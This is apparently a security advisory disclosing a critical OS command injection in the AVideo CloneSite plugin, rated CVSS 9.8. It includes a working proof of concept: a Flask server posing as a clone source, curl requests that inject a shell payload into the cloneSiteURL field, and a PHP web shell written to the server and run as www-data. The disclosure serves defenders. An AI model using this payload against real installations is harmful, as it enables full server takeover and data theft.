PT-2026-35332 — OS Command Injection in Packagist Wwbn Avideo

PT-2026-35332 · Packagist · Wwbn Avideo

Published

2026-04-16

Updated

2026-04-16

CVSS v3.1

9.8

Critical

Vector

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

Summary

The cloneServer.json.php endpoint in the CloneSite plugin constructs shell commands using user-controlled input (url parameter) without proper sanitization. The input is directly concatenated into a wget command executed via exec(), allowing command injection.

An attacker can inject arbitrary shell commands by breaking out of the intended URL context using shell metacharacters (e.g., ;). This leads to Remote Code Execution (RCE) on the server.

Details

Inside plugin/CloneSite/cloneClient.json.php(line112) didn't have proper sanitization

php

$objClone->cloneSiteURL = str replace("'", '', escapeshellarg($objClone->cloneSiteURL));

use str replace make ' added by escapeshellarg become so hacker can inject evil cloneSiteURL to rce

php

$sqlURL = "{$objClone->cloneSiteURL}videos/clones/{$json->sqlFile}"; 116
$cmd = "wget -O {$sqlFile} {$sqlURL}"; 117
exec($cmd . " 2>&1", $output, $return val);         119

The attack flow

make a evil site to provide date
add evil url in objects/pluginAddDataObject.json.php
access plugin/CloneSite/cloneClient.json.php to trigger rce

Poc

make a evil site use python like this

python

from flask import Flask, jsonify, request

app = Flask( name )

@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def catch all(path):
  print("PATH:", path)


  return jsonify({
      "error": False,
      "msg": "",
      "url": "http://target-site.com/",
      "key": "target clone key",
      "useRsync": 0,
      "videosDir": "/var/www/html/AVideo/videos/",
      "sqlFile": "Clone mysqlDump evil123.sql",
      "videoFiles": [],
      "photoFiles": []
    })



if  name  == ' main ':
  app.run(host='0.0.0.0', port=8071)

change url with payload like (need admin)

shell

curl -b 'PHPSESSID=<admin session>'
-X POST "http://127.0.0.1/objects/pluginAddDataObject.json.php" 
 -H "Content-Type: application/json" 
 -d '{
  "cloneSiteURL":"http://127.0.0.1:8071/;echo${IFS}"<?=system($ POST[1])?>"${IFS}>1.php;/",
  "cloneSiteSSHIP":"127.0.0.1",
  "cloneSiteSSHUser":"1",
  "cloneSiteSSHPort":"22",
  "cloneSiteSSHPassword":{
    "type":"encrypted",
    "value":"cU1SVkhSVkxqMmxDZlUrSFhNZnRvcFBtTmI3UXNGZ0VFVWxlLzdJL0pjWGFiVXgyb2Iyci9OOE5LN0p6TmN6Zg=="
  },
  "useRsync":true,
  "MaintenanceMode":false,
  "myKey":"ba882541262f3202ee5a5ad790ae5b70"
}' 
#inject evil code
curl "http://127.0.0.1/plugin/CloneSite/cloneClient.json.php" #trigger rce to write 1.php
curl "http://127.0.0.1/plugin/CloneSite/1.php" 
 -d '1=id'
 #uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=33(www-data) gid=33(www-data) groups=33(www-data)

this payload is to create a web shell

then access plugin/CloneSite/cloneClient.json.php

1.phpwill be created

impact

Remote Code Execution: An attacker can write arbitrary PHP code to any writable web-accessible directory, achieving full server compromise.
Full server compromise: With arbitrary PHP execution as the web server user, the attacker can read/modify the database, access all user data, pivot to other services, and potentially escalate privileges on the host.

Recommended Fix

add more powerful sanitization for $objClone->cloneSiteURL

Fix

OS Command Injection

Command Injection

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-78CWE-77

Related Identifiers

GHSA-XR6F-H4X7-R6QP

Affected Products

Wwbn Avideo